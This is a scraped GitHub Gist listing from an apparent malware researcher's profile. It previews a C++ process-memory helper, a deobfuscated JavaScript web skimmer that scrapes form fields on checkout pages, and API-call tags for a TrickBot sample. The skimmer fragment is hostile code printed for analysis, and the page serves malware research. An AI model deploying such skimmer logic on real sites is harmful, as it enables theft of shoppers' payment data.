Skip to content

Instantly share code, notes, and snippets.

malwarezone

View GitHub Profile
@malwarezone
malwarezone / snippet.cpp
Created Dec 11, 2018
Get limit of the set of pages allocated at the same base
View snippet.cpp
LPVOID get_area_limit(HANDLE processHandle, LPVOID first_addr)
{
MEMORY_BASIC_INFORMATION page_info = { 0 };
//go to the beginning of the area:
SIZE_T out = VirtualQueryEx(processHandle, first_addr, &page_info, sizeof(page_info));
if (GetLastError() == ERROR_INVALID_PARAMETER) {
return nullptr;
}
LPVOID alloc_base = page_info.AllocationBase;
LPVOID next_area = page_info.BaseAddress;
View onlineclouds.cloud_conversion_async_unfuscated.js
setTimeout(checkForCheckout, 100);
var snd = null;
function checkForCheckout() {
if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) {
scrapeAllFields();
}
}
function createQueryString() {
@malwarezone
malwarezone / 360000.tmptetup.csv
Created Oct 30, 2018
Tags for a TrickBot sample: c3737aaf6b613a7c7d5e0c6d3c0d60a2
View 360000.tmptetup.csv
10b4 ole32.CoInitializeEx
10d3 ole32.CoInitializeSecurity
1260 kernel32.VirtualFreeEx
1293 kernel32.MultiByteToWideChar
12c7 kernel32.MultiByteToWideChar
13e6 msvcrt.memcpy
141a OLEAUT32.SysAllocString
145b msvcrt._controlfp
1537 msvcrt._vsnwprintf
1609 kernel32.GetModuleHandleW
You can’t perform that action at this time.